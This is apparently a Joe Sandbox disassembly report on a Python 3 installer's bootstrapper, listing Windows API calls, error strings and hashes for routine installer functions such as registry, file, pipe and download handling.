                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 374144340-3168567549
                                                                                                                                  • Opcode ID: ed07a4df2a5cd003d2dca3b2e23d40935d4e1b0a2ce256f1b4506abde826bd6e
                                                                                                                                  • Instruction ID: 624f87910b391ab308bf9e9baed61a9ed76c6daac909f1b0b6b356914b70212c
                                                                                                                                  • Opcode Fuzzy Hash: ed07a4df2a5cd003d2dca3b2e23d40935d4e1b0a2ce256f1b4506abde826bd6e
                                                                                                                                  • Instruction Fuzzy Hash: 2821E52A700372A7DB601AA68D64F3B7698EFD0B61B14443FEE00DF350D668CD0242ED
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 004A8C87
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0048F86F,00000001,00000100,000001B4,00000000), ref: 004A8CD5
                                                                                                                                  Strings
                                                                                                                                  • Failed to open uninstall registry key., xrefs: 004A8C4A
                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004A8C24
                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 004A8CE4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCompareOpenString
                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                  • API String ID: 2817536665-2531018330
                                                                                                                                  • Opcode ID: 1f7ea79332a2b034a7bfd5a7e003bd535dc398e02f7816180b86bb14007cb26c
                                                                                                                                  • Instruction ID: 6ff5ede2d236c6d78aee43f782de312a4a04b7ad766f043afa0cf6117a3c6bdb
                                                                                                                                  • Opcode Fuzzy Hash: 1f7ea79332a2b034a7bfd5a7e003bd535dc398e02f7816180b86bb14007cb26c
                                                                                                                                  • Instruction Fuzzy Hash: D021A336901118FFDB11AB95CD4AFAEBA79EB11724F24016EF41076160CB794E909AA8
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,004CB478,00000000,00000000,?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?), ref: 004841A8
                                                                                                                                  • GetLastError.KERNEL32(?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?,00000000,00000000), ref: 004841B6
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,004CB478,?,?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?,00000000), ref: 00484226
                                                                                                                                  • GetLastError.KERNEL32(?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?,00000000,00000000), ref: 00484230
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\dirutil.cpp, xrefs: 00484260
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\dirutil.cpp
                                                                                                                                  • API String ID: 1375471231-215211224
                                                                                                                                  • Opcode ID: 8fc84972d43890c674fe2cf8d0be1abe93a09104f5d299bec221f7b6c25d6127
                                                                                                                                  • Instruction ID: 738ca05c2356deae543f631df5cda8c8adc147ab099b2692e9c048720982098d
                                                                                                                                  • Opcode Fuzzy Hash: 8fc84972d43890c674fe2cf8d0be1abe93a09104f5d299bec221f7b6c25d6127
                                                                                                                                  • Instruction Fuzzy Hash: B3210436A4833397DB613AA54C49B7FB654EFE5BE1F1148A7FD04AB240C7288C4193D9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004AD0DB
                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 004AD109
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 004AD112
                                                                                                                                  Strings
                                                                                                                                  • Failed to allocate buffer., xrefs: 004AD08A
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\netfxchainer.cpp, xrefs: 004AD080
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                  • String ID: Failed to allocate buffer.$c:\agent\_work\138\s\src\burn\engine\netfxchainer.cpp
                                                                                                                                  • API String ID: 944053411-3611595887
                                                                                                                                  • Opcode ID: 6362490cdd8e4555beb7136e9e1151bcc09392fe58aa7275a779227ca78c8c3e
                                                                                                                                  • Instruction ID: 940dfc28965a970da016cf997bc357fd3b9a97233336bddde9b383ac9dc178e5
                                                                                                                                  • Opcode Fuzzy Hash: 6362490cdd8e4555beb7136e9e1151bcc09392fe58aa7275a779227ca78c8c3e
                                                                                                                                  • Instruction Fuzzy Hash: 8D21F370A00306BFD7009F28C845A5AB7F4FF18314F108A3AF525A7351C375AD508B94
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00486640,00486640,?,004856B3,?,?,00000000), ref: 00485759
                                                                                                                                  • GetLastError.KERNEL32(?,004856B3,?,?,00000000,?,?,00486640,?,00487FF2,?,?,?,?,?), ref: 00485788
                                                                                                                                  Strings
                                                                                                                                  • version.dll, xrefs: 0048574B
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 004857AC
                                                                                                                                  • Failed to compare strings., xrefs: 004857B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                  • String ID: Failed to compare strings.$c:\agent\_work\138\s\src\burn\engine\variable.cpp$version.dll
                                                                                                                                  • API String ID: 1733990998-3062438852
                                                                                                                                  • Opcode ID: b07b111e037a24890e6b27f98c5c49433c3300d49763ef32805646e19413cfed
                                                                                                                                  • Instruction ID: 6f38e3396564bfb1469af9097f944cd0555b8d4839aa358ef6122f72d3f4c98b
                                                                                                                                  • Opcode Fuzzy Hash: b07b111e037a24890e6b27f98c5c49433c3300d49763ef32805646e19413cfed
                                                                                                                                  • Instruction Fuzzy Hash: C6210436600625EBC711AF988C41E5EBBA4EF49770F31461BE815AB3C0D638ED018798
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004C349D
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004C34B8
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004C34C7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID: 5<L$5<L
                                                                                                                                  • API String ID: 3341692771-2296728643
                                                                                                                                  • Opcode ID: 10d0f69d3083909febc14407ca079efe158bbd210fd78ca1c684b4b0af7bfbf8
                                                                                                                                  • Instruction ID: 8834a518ab793ff4fcce3ebffc5b8e0f6d2a68edbb96ac93e21bad0577c244e6
                                                                                                                                  • Opcode Fuzzy Hash: 10d0f69d3083909febc14407ca079efe158bbd210fd78ca1c684b4b0af7bfbf8
                                                                                                                                  • Instruction Fuzzy Hash: B8215E75600518FFDB5ADF95CD44EAEBBB8EF44705720819EE10593210E778EB00DB68
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Failed to find variable., xrefs: 0048996B
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\condition.cpp, xrefs: 00489920, 00489961
                                                                                                                                  • Failed to read next symbol., xrefs: 0048999A
                                                                                                                                  • Failed to parse condition '%ls' at position: %u, xrefs: 00489930
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                  • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$c:\agent\_work\138\s\src\burn\engine\condition.cpp
                                                                                                                                  • API String ID: 2001391462-796209
                                                                                                                                  • Opcode ID: 2c79d0e48ba07bbc315e73b28ec4ff670d1ab25d242a32a3ae4949d601f9467a
                                                                                                                                  • Instruction ID: 0270afc7f067c2bf6921817347bde717ad5348026ecc2c084ce2e49f3b30bb21
                                                                                                                                  • Opcode Fuzzy Hash: 2c79d0e48ba07bbc315e73b28ec4ff670d1ab25d242a32a3ae4949d601f9467a
                                                                                                                                  • Instruction Fuzzy Hash: 44110476680A10B6DB113D6D8C46FAF7A44EB11B10F18081FFD006A392CAAACD1097AD
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004CB4F0,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,00495412), ref: 00494B38
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\pipe.cpp, xrefs: 00494B70
                                                                                                                                  • Failed to write message type to pipe., xrefs: 00494B7A
                                                                                                                                  • Failed to allocate message to write., xrefs: 00494B17
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp
                                                                                                                                  • API String ID: 3934441357-1028276228
                                                                                                                                  • Opcode ID: 2f1693a790447e0f809dc4f926802493da578a207e6086161f479e14f9cfb579
                                                                                                                                  • Instruction ID: 03ec997ea3a3af4733560bb9368371e2ba32006fe1df194fb2fbb751284eee31
                                                                                                                                  • Opcode Fuzzy Hash: 2f1693a790447e0f809dc4f926802493da578a207e6086161f479e14f9cfb579
                                                                                                                                  • Instruction Fuzzy Hash: 6A115972940229BBCF11DE95DD09F9F7EA9EBC0761F110167F800A6250D678EE41DAA8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00498DF5,0000001A,?,?,00000000,00000000), ref: 00498246
                                                                                                                                  • GetLastError.KERNEL32(?,?,00498DF5,0000001A,?,?,00000000,00000000,?,?,?), ref: 00498250
                                                                                                                                  Strings
                                                                                                                                  • Failed to create well known SID., xrefs: 0049827E
                                                                                                                                  • Failed to allocate memory for well known SID., xrefs: 0049822E
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 00498224, 00498274
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$c:\agent\_work\138\s\src\burn\engine\cache.cpp
                                                                                                                                  • API String ID: 2186923214-2819944635
                                                                                                                                  • Opcode ID: e110878da34468a2640e34e63a8698f821915b22b1c4b9c8e5fc511d2d896f8b
                                                                                                                                  • Instruction ID: 90559760736e684cda789419d1aba99cff4ad024d6c08650afb8e80cdb91379b
                                                                                                                                  • Opcode Fuzzy Hash: e110878da34468a2640e34e63a8698f821915b22b1c4b9c8e5fc511d2d896f8b
                                                                                                                                  • Instruction Fuzzy Hash: 4F010636601720B69A206B5A6C06E5F5A589F42F60F21006FBD04BF240EE6CCE0082EC
                                                                                                                                  APIs
                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 004ADB93
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004ADBBD
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,004ADD8B,00000000,?,?,?,00000000,00000000), ref: 004ADBC5
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp, xrefs: 004ADBE9
                                                                                                                                  • Failed while waiting for download., xrefs: 004ADBF3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                  • String ID: Failed while waiting for download.$c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp
                                                                                                                                  • API String ID: 435350009-500302221
                                                                                                                                  • Opcode ID: 8a61cf252d2697ce1ccac65d737aeecf39906845f31db22d5e37f710c8fe9787
                                                                                                                                  • Instruction ID: 70211b92bd4402662b46ecf10a3b5c3c2688aa118c62dba2a26cbcf0eb25e75f
                                                                                                                                  • Opcode Fuzzy Hash: 8a61cf252d2697ce1ccac65d737aeecf39906845f31db22d5e37f710c8fe9787
                                                                                                                                  • Instruction Fuzzy Hash: 9C01E973E4537577D7209AA95C0AE9F7A9CEF15761F010127FD06F6280D6A8AE0081FC
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\shelutil.cpp, xrefs: 004C415F
                                                                                                                                  • <, xrefs: 004C4126
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                  • String ID: <$c:\agent\_work\138\s\src\libs\dutil\shelutil.cpp
                                                                                                                                  • API String ID: 3023784893-455212561
                                                                                                                                  • Opcode ID: f3fbf38185f49c0df300e7e606c82b1e4f8ded1d7cff50b2779c10eeef868331
                                                                                                                                  • Instruction ID: 4f46ed2aafe5afdc8b1ec9b52148cf8aabffc96fdc7d9aad39355cf6ba5fd5fa
                                                                                                                                  • Opcode Fuzzy Hash: f3fbf38185f49c0df300e7e606c82b1e4f8ded1d7cff50b2779c10eeef868331
                                                                                                                                  • Instruction Fuzzy Hash: D321E7B5E01229EBCB50CFA9D945ADEBBF8AB08750F10401BF955E7340D7749A408F94
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00489B76
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 00489B60
                                                                                                                                  • Failed to get Condition inner text., xrefs: 00489B46
                                                                                                                                  • Failed to select condition node., xrefs: 00489B2D
                                                                                                                                  • Condition, xrefs: 00489B11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                                                                                  • API String ID: 3341692771-3600577998
                                                                                                                                  • Opcode ID: 5ca4e01c99b4de1d5531dde9d1c5d9978b01f9b31431c5e9481943cd4664aa86
                                                                                                                                  • Instruction ID: 7d26c73042b379e5325fbb40b9d50ea119ce7f75c1ca9c41562f729954c2ebda
                                                                                                                                  • Opcode Fuzzy Hash: 5ca4e01c99b4de1d5531dde9d1c5d9978b01f9b31431c5e9481943cd4664aa86
                                                                                                                                  • Instruction Fuzzy Hash: CC118235D00628FBCB56BB94EC05FBEBA68AF00715F24456BF801B6250C779BE50978C
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0048688A
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486894
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 004868B8
                                                                                                                                  • Failed to get temp path., xrefs: 004868C2
                                                                                                                                  • Failed to set variant value., xrefs: 004868DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                  • String ID: Failed to get temp path.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 1238063741-1270281381
                                                                                                                                  • Opcode ID: dc8ff975414fccd883ecfc5ee9e51e8545a68b20941b8d28c42177af6b2a4cea
                                                                                                                                  • Instruction ID: c771e2a3130483efd630ce5bf63d976556fefb9800a2317a0a133e39c72ad411
                                                                                                                                  • Opcode Fuzzy Hash: dc8ff975414fccd883ecfc5ee9e51e8545a68b20941b8d28c42177af6b2a4cea
                                                                                                                                  • Instruction Fuzzy Hash: 25010476E42324A7D750BB559C06FAE73A8AB00B14F11056BFD18FB281DA68EE0447DD
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C488B: FindFirstFileW.KERNEL32(004A907E,?,00000100,00000000,00000000), ref: 004C48C6
                                                                                                                                    • Part of subcall function 004C488B: FindClose.KERNEL32(00000000), ref: 004C48D2
                                                                                                                                  • SetFileAttributesW.KERNEL32(004A907E,00000080,00000000,004A907E,000000FF,00000000,?,?,004A907E), ref: 004C45CC
                                                                                                                                  • GetLastError.KERNEL32(?,?,004A907E), ref: 004C45D6
                                                                                                                                  • DeleteFileW.KERNEL32(004A907E,00000000,004A907E,000000FF,00000000,?,?,004A907E), ref: 004C45F6
                                                                                                                                  • GetLastError.KERNEL32(?,?,004A907E), ref: 004C4600
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C461B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 3967264933-3168567549
                                                                                                                                  • Opcode ID: 84c32e1f50a1f1f410fae599d2b13c475e5f834b3fa1014155617e28aa4e8a29
                                                                                                                                  • Instruction ID: d215f746091a5226bb00a8a372c2f4b3fd977332ed77b7277d1c5fa42e9cf7b5
                                                                                                                                  • Opcode Fuzzy Hash: 84c32e1f50a1f1f410fae599d2b13c475e5f834b3fa1014155617e28aa4e8a29
                                                                                                                                  • Instruction Fuzzy Hash: 7201493AA01736B7EB7116668E25F5B7D58AF417A1F01022AFD44E6290C72CCE0085EC
